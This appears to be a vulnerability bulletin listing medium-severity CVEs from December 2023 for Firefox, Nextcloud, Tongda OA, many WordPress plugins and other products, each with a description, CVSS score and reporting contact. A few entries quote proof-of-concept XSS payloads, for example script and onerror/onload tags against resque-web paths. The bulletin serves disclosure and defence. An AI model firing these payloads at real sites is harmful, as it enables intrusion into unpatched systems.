cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
linux — kernel A null pointer dereference vulnerability was found in ath10k_wmi_tlv_op_pull_mgmt_tx_compl_ev() in drivers/net/wireless/ath/ath10k/wmi-tlv.c in the Linux kernel. This issue could be exploited to trigger a denial of service. 2023-12-21 4.4 CVE-2023-7042
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
m-files_corporation — m-files_server A vulnerable API method in M-Files Server before 23.12.13195.0 allows for uncontrolled resource consumption. Authenticated attacker can exhaust server storage space to a point where the server can no longer serve requests. 2023-12-20 6.5 CVE-2023-6910
security@m-files.com
microsoft — edge_chromium Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability 2023-12-15 4.3 CVE-2023-36878
secure@microsoft.com
microsoft — windows
 		 Windows Local Session Manager (LSM) Denial of Service Vulnerability 2023-12-20 6.5 CVE-2022-44684
secure@microsoft.com
microweber — microweber Business Logic Errors in GitHub repository microweber/microweber prior to 2.0. 2023-12-15 4.3 CVE-2023-6832
security@huntr.dev
security@huntr.dev
moxa — iologik_e1200_series A weak cryptographic algorithm vulnerability has been identified in ioLogik E1200 Series firmware versions v3.3 and prior. This vulnerability can help an attacker compromise the confidentiality of sensitive data. This vulnerability may lead an attacker to get unexpected authorization. 2023-12-23 6.5 CVE-2023-5962
psirt@moxa.com
mozilla — firefox A `&lt;dialog>` element could have been manipulated to paint content outside of a sandboxed iframe. This could allow untrusted content to display under the guise of trusted content. This vulnerability affects Firefox < 121. 2023-12-19 6.5 CVE-2023-6869
security@mozilla.org
security@mozilla.org
mozilla — firefox Browser tab titles were being leaked by GNOME to system logs. This could potentially expose the browsing habits of users running in a private tab. This vulnerability affects Firefox < 121. 2023-12-19 6.5 CVE-2023-6872
security@mozilla.org
security@mozilla.org
mozilla — firefox Multiple NSS NIST curves were susceptible to a side-channel attack known as “Minerva”. This attack could potentially allow an attacker to recover the private key. This vulnerability affects Firefox < 121. 2023-12-19 4.3 CVE-2023-6135
security@mozilla.org
security@mozilla.org
mozilla — firefox In some instances, the user-agent would allow push requests which lacked a valid VAPID even though the push manager subscription defined one. This could allow empty messages to be sent from unauthorized parties. *This bug only affects Firefox on Android.* This vulnerability affects Firefox < 121. 2023-12-19 4.3 CVE-2023-6868
security@mozilla.org
security@mozilla.org
mozilla — firefox Applications which spawn a Toast notification in a background thread may have obscured fullscreen notifications displayed by Firefox. *This issue only affects Android versions of Firefox and Firefox Focus.* This vulnerability affects Firefox < 121. 2023-12-19 4.3 CVE-2023-6870
security@mozilla.org
security@mozilla.org
mozilla — firefox Under certain conditions, Firefox did not display a warning when a user attempted to navigate to a new protocol handler. This vulnerability affects Firefox < 121. 2023-12-19 4.3 CVE-2023-6871
security@mozilla.org
security@mozilla.org
mozilla — firefox/firefox_esr `EncryptingOutputStream` was susceptible to exposing uninitialized data. This issue could only be abused in order to write data to a local disk which may have implications for private browsing mode. This vulnerability affects Firefox ESR < 115.6 and Firefox < 121. 2023-12-19 6.5 CVE-2023-6865
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
mozilla — firefox/firefox_esr The timing of a button click causing a popup to disappear was approximately the same length as the anti-clickjacking delay on permission prompts. It was possible to use this fact to surprise users by luring them to click where the permission grant button would be about to appear. This vulnerability affects Firefox ESR < 115.6 and Firefox < 121. 2023-12-19 6.1 CVE-2023-6867
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
mozilla — multiple_products The `VideoBridge` allowed any content process to use textures produced by remote decoders. This could be abused to escape the sandbox. This vulnerability affects Firefox ESR < 115.6, Thunderbird < 115.6, and Firefox < 121. 2023-12-19 6.5 CVE-2023-6860
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
mozilla — multiple_products When resolving a symlink, a race may occur where the buffer passed to `readlink` may actually be smaller than necessary. *This bug only affects Firefox on Unix-based operating systems (Android, Linux, MacOS). Windows is unaffected.* This vulnerability affects Firefox ESR < 115.6, Thunderbird < 115.6, and Firefox < 121. 2023-12-19 5.3 CVE-2023-6857
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
mozilla — thunderbird The signature of a digitally signed S/MIME email message may optionally specify the signature creation date and time. If present, Thunderbird did not compare the signature creation date with the message date and time, and displayed a valid signature despite a date or time mismatch. This could be used to give recipients the impression that a message was sent at a different date or time. This vulnerability affects Thunderbird < 115.6. 2023-12-19 4.3 CVE-2023-50761
security@mozilla.org
security@mozilla.org
security@mozilla.org
mozilla — thunderbird When processing a PGP/MIME payload that contains digitally signed text, the first paragraph of the text was never shown to the user. This is because the text was interpreted as a MIME message and the first paragraph was always treated as an email header section. A digitally signed text from a different context, such as a signed GIT commit, could be used to spoof an email message. This vulnerability affects Thunderbird < 115.6. 2023-12-19 4.3 CVE-2023-50762
security@mozilla.org
security@mozilla.org
security@mozilla.org
mr-corner — amazing_little_poll Stored XSS vulnerability in Amazing Little Poll, affecting versions 1.3 and 1.4. This vulnerability allows a remote attacker to store a malicious JavaScript payload in the “lp_admin.php” file in the “question” and “item” parameters. This vulnerability could lead to malicious JavaScript execution while the page is loading. 2023-12-20 4.6 CVE-2023-6769
cve-coordination@incibe.es
netapp — ontap ONTAP 9 versions 9.12.1P8, 9.13.1P4, and 9.13.1P5 are susceptible to a vulnerability which will cause all SAS-attached FIPS 140-2 drives to become unlocked after a system reboot or power cycle or a single SAS-attached FIPS 140-2 drive to become unlocked after reinsertion. This could lead to disclosure of sensitive information to an attacker with physical access to the unlocked drives. 2023-12-15 4.6 CVE-2023-27317
security-alert@netapp.com
netapp — ontap_mediator ONTAP Mediator versions prior to 1.7 are susceptible to a vulnerability that can allow an unauthenticated attacker to enumerate URLs via REST API. 2023-12-21 5.3 CVE-2023-27319
security-alert@netapp.com
nextcloud — security-advisories Nextcloud Server provides data storage for Nextcloud, an open source cloud platform. In Nextcloud Server prior to versions 26.0.9 and 27.1.4; as well as Nextcloud Enterprise Server prior to versions 23.0.12.13, 24.0.12.9, 25.0.13.4, 26.0.9, and 27.1.4; when an attacker manages to get access to an active session of another user via another way, they could delete and modify workflows by sending calls directly to the API bypassing the password confirmation shown in the UI. Nextcloud Server versions 26.0.9 and 27.1.4 and Nextcloud Enterprise Server versions 23.0.12.13, 24.0.12.9, 25.0.13.4, 26.0.9, and 27.1.4 contain a patch for this issue. No known workarounds are available. 2023-12-22 5.4 CVE-2023-49791
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
nextcloud — security-advisories Nextcloud Server provides data storage for Nextcloud, an open source cloud platform. In Nextcloud Server prior to versions 26.0.9 and 27.1.4; as well as Nextcloud Enterprise Server prior to versions 23.0.12.13, 24.0.12.9, 25.0.13.4, 26.0.9, and 27.1.4; when a (reverse) proxy is configured as trusted proxy the server could be tricked into reading a wrong remote address for an attacker, allowing them executing authentication attempts than intended. Nextcloud Server versions 26.0.9 and 27.1.4 and Nextcloud Enterprise Server versions 23.0.12.13, 24.0.12.9, 25.0.13.4, 26.0.9, and 27.1.4 contain a patch for this issue. No known workarounds are available. 2023-12-22 5.3 CVE-2023-49792
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
nextcloud — security-advisories The Nextcloud iOS Files app allows users of iOS to interact with Nextcloud, a self-hosted productivity platform. Prior to version 4.9.2, the application can be used without providing the 4 digit PIN code. Nextcloud iOS Files app should be upgraded to 4.9.2 to receive the patch. No known workarounds are available. 2023-12-22 4.3 CVE-2023-49790
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
openbsd — openssh In ssh-agent in OpenSSH before 9.6, certain destination constraints can be incompletely applied. When destination constraints are specified during addition of PKCS#11-hosted private keys, these constraints are only applied to the first key, even if a PKCS#11 token returns multiple keys. 2023-12-18 5.5 CVE-2023-51384
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
pedroetb — tts-api A vulnerability has been found in pedroetb tts-api up to 2.1.4 and classified as critical. This vulnerability affects the function onSpeechDone of the file app.js. The manipulation leads to os command injection. Upgrading to version 2.2.0 is able to address this issue. The patch is identified as 29d9c25415911ea2f8b6de247cb5c4607d13d434. It is recommended to upgrade the affected component. VDB-248278 is the identifier assigned to this vulnerability. 2023-12-19 5.5 CVE-2019-25158
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
phpgurukul — online_notes_sharing_system A vulnerability was found in PHPGurukul Online Notes Sharing System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /user/add-notes.php. The manipulation leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-248741 was assigned to this vulnerability. 2023-12-22 5.5 CVE-2023-7054
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
phpgurukul — online_notes_sharing_system A vulnerability was found in PHPGurukul Online Notes Sharing System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /user/manage-notes.php of the component Notes Handler. The manipulation of the argument delid leads to cross-site request forgery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-248738 is the identifier assigned to this vulnerability. 2023-12-21 4.3 CVE-2023-7051
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
phpgurukul — online_notes_sharing_system A vulnerability was found in PHPGurukul Online Notes Sharing System 1.0. It has been classified as problematic. This affects an unknown part of the file /user/profile.php. The manipulation of the argument name leads to cross-site request forgery. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-248739. 2023-12-22 4.3 CVE-2023-7052
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
phpgurukul — online_notes_sharing_system A vulnerability classified as problematic has been found in PHPGurukul Online Notes Sharing System 1.0. Affected is an unknown function of the file /user/profile.php of the component Contact Information Handler. The manipulation of the argument mobilenumber leads to improper access controls. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-248742 is the identifier assigned to this vulnerability. 2023-12-22 4.3 CVE-2023-7055
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
phpmyfaq — phpmyfaq Cross-site Scripting (XSS) – Stored in GitHub repository thorsten/phpmyfaq prior to 3.1.17. 2023-12-16 5.4 CVE-2023-6889
security@huntr.dev
security@huntr.dev
phpmyfaq — phpmyfaq Cross-site Scripting (XSS) – Stored in GitHub repository thorsten/phpmyfaq prior to 3.1.17. 2023-12-16 5.4 CVE-2023-6890
security@huntr.dev
security@huntr.dev
progress_software_corporation — sitefinity A malicious user could potentially use the Sitefinity system for the distribution of phishing emails. 2023-12-20 4.7 CVE-2023-6784
security@progress.com
security@progress.com
pymedusa — medusa Medusa is an automatic video library manager for TV shows. Versions prior to 1.0.19 are vulnerable to unauthenticated blind server-side request forgery (SSRF). The `testDiscord` request handler in `medusa/server/web/home/handler.py` does not validate the user-controlled `discord_webhook` variable and passes it to the `notifiers.discord_notifier.test_notify` method, then `_notify_discord` and finally `_send_discord_msg` method, which sends a POST request to the user-controlled URL on line 64 in `/medusa/notifiers/discord.py`, which leads to a blind server-side request forgery. This issue allows for crafting POST requests on behalf of the Medusa server. Version 1.0.19 contains a fix for the issue. 2023-12-22 5.3 CVE-2023-50258
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
pymedusa — medusa Medusa is an automatic video library manager for TV shows. Versions prior to 1.0.19 are vulnerable to unauthenticated blind server-side request forgery (SSRF). The `testslack` request handler in `medusa/server/web/home/handler.py` does not validate the user-controlled `slack_webhook` variable and passes it to the `notifiers.slack_notifier.test_notify` method, then `_notify_slack` and finally `_send_slack` method, which sends a POST request to the user-controlled URL on line 103 in `/medusa/notifiers/slack.py`, which leads to a blind server-side request forgery (SSRF). This issue allows for crafting POST requests on behalf of the Medusa server. Version 1.0.19 contains a fix for the issue. 2023-12-22 5.3 CVE-2023-50259
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
redhat — keycloak A flaw was found in Keycloak. This issue may allow an attacker to steal authorization codes or tokens from clients using a wildcard in the JARM response mode “form_post.jwt” which could be used to bypass the security patch implemented to address CVE-2023-6134. 2023-12-18 6.1 CVE-2023-6927
secalert@redhat.com
secalert@redhat.com
resque — resque Resque (pronounced like “rescue”) is a Redis-backed library for creating background jobs, placing those jobs on multiple queues, and processing them later. resque-web in resque versions before 2.1.0 are vulnerable to reflected XSS through the current_queue parameter in the path of the queues endpoint. This issue has been patched in version 2.1.0. 2023-12-21 6.3 CVE-2023-50724
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
resque — resque Resque is a Redis-backed Ruby library for creating background jobs, placing them on multiple queues, and processing them later. The following paths in resque-web have been found to be vulnerable to reflected XSS: “/failed/?class=<script>alert(document.cookie)</script>” and “/queues/><img src=a onerror=alert(document.cookie)>”. This issue has been patched in version 2.2.1. 2023-12-22 6.3 CVE-2023-50725
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
resque — resque Resque is a Redis-backed Ruby library for creating background jobs, placing them on multiple queues, and processing them later. Reflected XSS issue occurs when /queues is appended with /”><svg%20onload=alert(domain)>. This issue has been patched in version 2.6.0. 2023-12-22 6.3 CVE-2023-50727
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
satellite — satellite An arithmetic overflow flaw was found in Satellite when creating a new personal access token. This flaw allows an attacker who uses this arithmetic overflow to create personal access tokens that are valid indefinitely, resulting in damage to the system’s integrity. 2023-12-18 6 CVE-2023-4320
secalert@redhat.com
secalert@redhat.com
silabs — z-wave_software_development_kit A denial of service vulnerability exists in all Silicon Labs Z-Wave controller and endpoint devices running Z-Wave SDK v7.20.3 (Gecko SDK v4.3.3) and earlier. This attack can be carried out only by devices on the network sending a stream of packets to the device. 2023-12-15 6.5 CVE-2023-5310
product-security@silabs.com
product-security@silabs.com
silicon_labs — gsdk An Observable Timing Discrepancy, Covert Timing Channel vulnerability in Silabs GSDK on ARM potentially allows Padding Oracle Crypto Attack on CBC PKCS7. This issue affects GSDK: through 4.4.0. 2023-12-21 4.6 CVE-2023-41097
product-security@silabs.com
product-security@silabs.com
skupper_operator — skupper_operator A flaw was found in the Skupper operator, which may permit a certain configuration to create a service account that would allow an authenticated attacker in the adjacent cluster to view deployments in all namespaces in the cluster. This issue permits unauthorized viewing of information outside of the user’s purview. 2023-12-18 6.8 CVE-2023-5056
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
snowflakedb — snowflake-connector-net The Snowflake .NET driver provides an interface to the Microsoft .NET open source software framework for developing applications. Snowflake recently received a report about a vulnerability in the Snowflake Connector .NET where the checks against the Certificate Revocation List (CRL) were not performed where the insecureMode flag was set to false, which is the default setting. The vulnerability affects versions between 2.0.25 and 2.1.4 (inclusive). Snowflake fixed the issue in version 2.1.5. 2023-12-22 6 CVE-2023-51662
security-advisories@github.com
security-advisories@github.com
softnext — mail_sqr_expert Softnext Mail SQR Expert is an email management platform, it has a Local File Inclusion (LFI) vulnerability in a special URL. An unauthenticated remote attacker can exploit this vulnerability to execute arbitrary PHP file with .asp file extension under specific system paths, to access and modify partial system information but does not affect service availability. 2023-12-15 6.5 CVE-2023-48381
twcert@cert.org.tw
softnext — mail_sqr_expert Softnext Mail SQR Expert is an email management platform, it has a Local File Inclusion (LFI) vulnerability in a mail deliver-related URL. An unauthenticated remote attacker can exploit this vulnerability to execute arbitrary PHP file with .asp file extension under specific system paths, to access and modify partial system information but does not affect service availability. 2023-12-15 6.5 CVE-2023-48382
twcert@cert.org.tw
softnext — mail_sqr_expert Softnext Mail SQR Expert is an email management platform, it has inadequate filtering for a specific URL parameter within a specific function. An unauthenticated remote attacker can perform Blind SSRF attack to discover internal network topology base on URL error response. 2023-12-15 5.3 CVE-2023-48379
twcert@cert.org.tw
sourcecodester — simple_image_stack_website A vulnerability was found in SourceCodester Simple Image Stack Website 1.0. It has been rated as problematic. This issue affects some unknown processing. The manipulation of the argument search with the input sy2ap%22%3e%3cscript%3ealert(1)%3c%2fscript%3etkxh1 leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-248255. 2023-12-17 6.1 CVE-2023-6896
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
sourcecodester — simple_student_attendance_system A vulnerability was found in SourceCodester Simple Student Attendance System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality. The manipulation of the argument page leads to path traversal: ‘../filedir’. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-248749 was assigned to this vulnerability. 2023-12-22 6.3 CVE-2023-7058
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
sudo — sudo A flaw was found in sudo in the handling of ipa_hostname, where ipa_hostname from /etc/sssd/sssd.conf was not propagated in sudo. Therefore, it leads to privilege mismanagement vulnerability in applications, where client hosts retain privileges even after retracting them. 2023-12-23 6.6 CVE-2023-7090
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
systemd-resolved — systemd-resolved A vulnerability was found in systemd-resolved. This issue may allow systemd-resolved to accept records of DNSSEC-signed domains even when they have no signature, allowing man-in-the-middles (or the upstream DNS resolver) to manipulate records. 2023-12-23 5.9 CVE-2023-7008
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
taiwan-ca — jcicsecuritytool TAIWAN-CA(TWCA) JCICSecurityTool’s Registry-related functions have insufficient filtering for special characters. An unauthenticated remote attacker can inject malicious script into a webpage to perform XSS (Stored Cross-Site Scripting) attack. 2023-12-15 6.1 CVE-2023-48387
twcert@cert.org.tw
tcpreplay — tcpreplay Within tcpreplay’s tcprewrite, a double free vulnerability has been identified in the tcpedit_dlt_cleanup() function within plugins/dlt_plugins.c. This vulnerability can be exploited by supplying a specifically crafted file to the tcprewrite binary. This flaw enables a local attacker to initiate a Denial of Service (DoS) attack. 2023-12-21 5.5 CVE-2023-4256
secalert@redhat.com
secalert@redhat.com
tongda — tongda_office_anywhere A vulnerability was found in Tongda OA 2017 up to 11.9 and classified as critical. This issue affects some unknown processing of the file general/wiki/cp/ct/view.php. The manipulation of the argument TEMP_ID leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 11.10 is able to address this issue. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-248567. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-21 6.3 CVE-2023-7020
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
tongda — tongda_office_anywhere A vulnerability was found in Tongda OA 2017 up to 11.9. It has been classified as critical. Affected is an unknown function of the file general/vehicle/checkup/delete_search.php. The manipulation of the argument VU_ID leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 11.10 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-248568. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-21 6.3 CVE-2023-7021
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
tongda — tongda_office_anywhere A vulnerability was found in Tongda OA 2017 up to 11.9. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file general/work_plan/manage/delete_all.php. The manipulation of the argument DELETE_STR leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-248569 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-21 6.3 CVE-2023-7022
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
tongda — tongda_office_anywhere A vulnerability was found in Tongda OA 2017 up to 11.9. It has been rated as critical. Affected by this issue is some unknown functionality of the file general/vehicle/query/delete.php. The manipulation of the argument VU_ID leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 11.10 is able to address this issue. It is recommended to upgrade the affected component. VDB-248570 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-21 6.3 CVE-2023-7023
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
uffizio — gps_tracker An Open Redirection vulnerability exists in Uffizio’s GPS Tracker all versions allows an attacker to construct a URL within the application that causes a redirection to an arbitrary external domain. 2023-12-16 6.1 CVE-2020-17484
cve@mitre.org
cve@mitre.org
uyumsoft — lioxerp Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Uyumsoft Information System and Technologies LioXERP allows Reflected XSS. This issue affects LioXERP: before v.146. 2023-12-21 6.1 CVE-2023-5988
iletisim@usom.gov.tr
uyumsoft — lioxerp Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Uyumsoft Information System and Technologies LioXERP allows Stored XSS. This issue affects LioXERP: before v.146. 2023-12-21 5.4 CVE-2023-5989
iletisim@usom.gov.tr
w3m — w3m An out-of-bounds write issue has been discovered in the backspace handling of the checkType() function in etc.c within the W3M application. This vulnerability is triggered by supplying a specially crafted HTML file to the w3m binary. Exploitation of this flaw could lead to application crashes, resulting in a denial of service condition. 2023-12-21 5.5 CVE-2023-4255
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
wordpress — wordpress Server-Side Request Forgery (SSRF) vulnerability in GiveWP GiveWP – Donation Plugin and Fundraising Platform. This issue affects GiveWP – Donation Plugin and Fundraising Platform: from n/a through 2.25.1. 2023-12-18 6.5 CVE-2022-40312
audit@patchstack.com
wordpress — wordpress Unrestricted Upload of File with Dangerous Type vulnerability in Glen Don L. Mongaya Drag and Drop Multiple File Upload for WooCommerce. This issue affects Drag and Drop Multiple File Upload for WooCommerce: from n/a through 1.0.8. 2023-12-21 6.5 CVE-2022-45377
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Tribulant Slideshow Gallery LITE. This issue affects Slideshow Gallery LITE: from n/a through 1.7.6. 2023-12-20 6.7 CVE-2023-28491
audit@patchstack.com
wordpress — wordpress Authorization Bypass Through User-Controlled Key vulnerability in WooCommerce Shipping Multiple Addresses. This issue affects Shipping Multiple Addresses: from n/a through 3.8.3. 2023-12-21 6.5 CVE-2023-32799
audit@patchstack.com
wordpress — wordpress URL Redirection to Untrusted Site (‘Open Redirect’) vulnerability in Magazine3 Core Web Vitals & PageSpeed Booster. This issue affects Core Web Vitals & PageSpeed Booster: from n/a through 1.0.12. 2023-12-19 6.1 CVE-2023-35883
audit@patchstack.com
wordpress — wordpress URL Redirection to Untrusted Site (‘Open Redirect’) vulnerability in CRM Perks Integration for Salesforce and Contact Form 7, WPForms, Elementor, Ninja Forms. This issue affects Integration for Salesforce and Contact Form 7, WPForms, Elementor, Ninja Forms: from n/a through 1.3.3. 2023-12-19 6.1 CVE-2023-37982
audit@patchstack.com
wordpress — wordpress URL Redirection to Untrusted Site (‘Open Redirect’) vulnerability in CRM Perks Integration for WooCommerce and QuickBooks. This issue affects Integration for WooCommerce and QuickBooks: from n/a through 1.2.3. 2023-12-19 6.1 CVE-2023-38478
audit@patchstack.com
wordpress — wordpress URL Redirection to Untrusted Site (‘Open Redirect’) vulnerability in CRM Perks Integration for WooCommerce and Zoho CRM, Books, Invoice, Inventory, Bigin. This issue affects Integration for WooCommerce and Zoho CRM, Books, Invoice, Inventory, Bigin: from n/a before 1.3.7. 2023-12-19 6.1 CVE-2023-38481
audit@patchstack.com
wordpress — wordpress URL Redirection to Untrusted Site (‘Open Redirect’) vulnerability in Doofinder Doofinder WP & WooCommerce Search. This issue affects Doofinder WP & WooCommerce Search: from n/a through 1.5.49. 2023-12-19 6.1 CVE-2023-40602
audit@patchstack.com
wordpress — wordpress URL Redirection to Untrusted Site (‘Open Redirect’) vulnerability in Swapnil V. Patil Login and Logout Redirect. This issue affects Login and Logout Redirect: from n/a through 2.0.3. 2023-12-19 6.1 CVE-2023-41648
audit@patchstack.com
wordpress — wordpress Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Jordy Meow Media File Renamer: Rename Files (Manual, Auto & AI). This issue affects Media File Renamer: Rename Files (Manual, Auto & AI): from n/a through 5.6.9. 2023-12-19 6.5 CVE-2023-44991
audit@patchstack.com
wordpress — wordpress URL Redirection to Untrusted Site (‘Open Redirect’) vulnerability in SERVIT Software Solutions affiliate-toolkit – WordPress Affiliate Plugin. This issue affects affiliate-toolkit – WordPress Affiliate Plugin: from n/a through 3.3.9. 2023-12-19 6.1 CVE-2023-45105
audit@patchstack.com
wordpress — wordpress Authorization Bypass Through User-Controlled Key vulnerability in KaineLabs Youzify – BuddyPress Community, User Profile, Social Network & Membership Plugin for WordPress. This issue affects Youzify – BuddyPress Community, User Profile, Social Network & Membership Plugin for WordPress: from n/a through 1.2.2. 2023-12-21 6.5 CVE-2023-47191
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Mahlamusa Who Hit The Page – Hit Counter allows SQL Injection. This issue affects Who Hit The Page – Hit Counter: from n/a through 1.4.14.3. 2023-12-18 6.5 CVE-2023-47558
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in captainform Forms by CaptainForm – Form Builder for WordPress allows Reflected XSS. his issue affects Forms by CaptainForm – Form Builder for WordPress: from n/a through 2.5.3. 2023-12-15 6.1 CVE-2023-49170
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in CodeRevolution WP Pocket URLs allows Reflected XSS. This issue affects WP Pocket URLs: from n/a through 1.0.2. 2023-12-15 6.1 CVE-2023-49176
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Gilles Dumas which template file allows Reflected XSS. This issue affects which template file: from n/a through 4.9.0. 2023-12-15 6.1 CVE-2023-49177
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Mr. Hdwplayer HDW Player Plugin (Video Player & Video Gallery) allows Reflected XSS. This issue affects HDW Player Plugin (Video Player & Video Gallery): from n/a through 5.0. 2023-12-15 6.1 CVE-2023-49178
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Fabio Marzocca List all posts by Authors, nested Categories and Titles allows Reflected XSS. This issue affects List all posts by Authors, nested Categories and Titles: from n/a through 2.7.10. 2023-12-15 6.1 CVE-2023-49182
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in NextScripts NextScripts: Social Networks Auto-Poster allows Reflected XSS. This issue affects NextScripts: Social Networks Auto-Poster: from n/a through 4.4.2. 2023-12-15 6.1 CVE-2023-49183
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Doofinder Doofinder WP & WooCommerce Search allows Reflected XSS. This issue affects Doofinder WP & WooCommerce Search: from n/a through 2.1.7. 2023-12-15 6.1 CVE-2023-49185
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Spoonthemes Adifier – Classified Ads WordPress Theme allows Reflected XSS. This issue affects Adifier – Classified Ads WordPress Theme: from n/a before 3.1.4. 2023-12-15 6.1 CVE-2023-49187
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in smp7, wp.Insider Simple Membership allows Reflected XSS. This issue affects Simple Membership: from n/a through 4.3.8. 2023-12-19 6.1 CVE-2023-50376
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Currency.Wiki Currency Converter Widget – Exchange Rates allows Stored XSS. This issue affects Currency Converter Widget – Exchange Rates: from n/a through 3.0.2. 2023-12-21 6.5 CVE-2023-50822
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Wipeout Media CSS & JavaScript Toolbox allows Stored XSS. This issue affects CSS & JavaScript Toolbox: from n/a through 11.7. 2023-12-21 6.5 CVE-2023-50823
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Brian Batt Insert or Embed Articulate Content into WordPress allows Stored XSS. This issue affects Insert or Embed Articulate Content into WordPress: from n/a through 4.3000000021. 2023-12-21 6.5 CVE-2023-50824
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Terrier Tenacity iframe Shortcode allows Stored XSS. This issue affects iframe Shortcode: from n/a through 2.0. 2023-12-21 6.5 CVE-2023-50825
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in VillaTheme CURCY – Multi Currency for WooCommerce allows Stored XSS. This issue affects CURCY – Multi Currency for WooCommerce: from n/a through 2.2.0. 2023-12-21 6.5 CVE-2023-50831
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in ExtendThemes Colibri Page Builder allows Stored XSS. This issue affects Colibri Page Builder: from n/a through 1.0.239. 2023-12-21 6.5 CVE-2023-50833
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in August Infotech WooCommerce Menu Extension allows Stored XSS. This issue affects WooCommerce Menu Extension: from n/a through 1.6.2. 2023-12-21 6.5 CVE-2023-50834
audit@patchstack.com
wordpress — wordpress The Product Catalog Mode For WooCommerce WordPress plugin before 5.0.3 does not properly authorize settings updates or escape settings values, leading to stored XSS by unauthenticated users. 2023-12-18 6.1 CVE-2023-5348
contact@wpscan.com
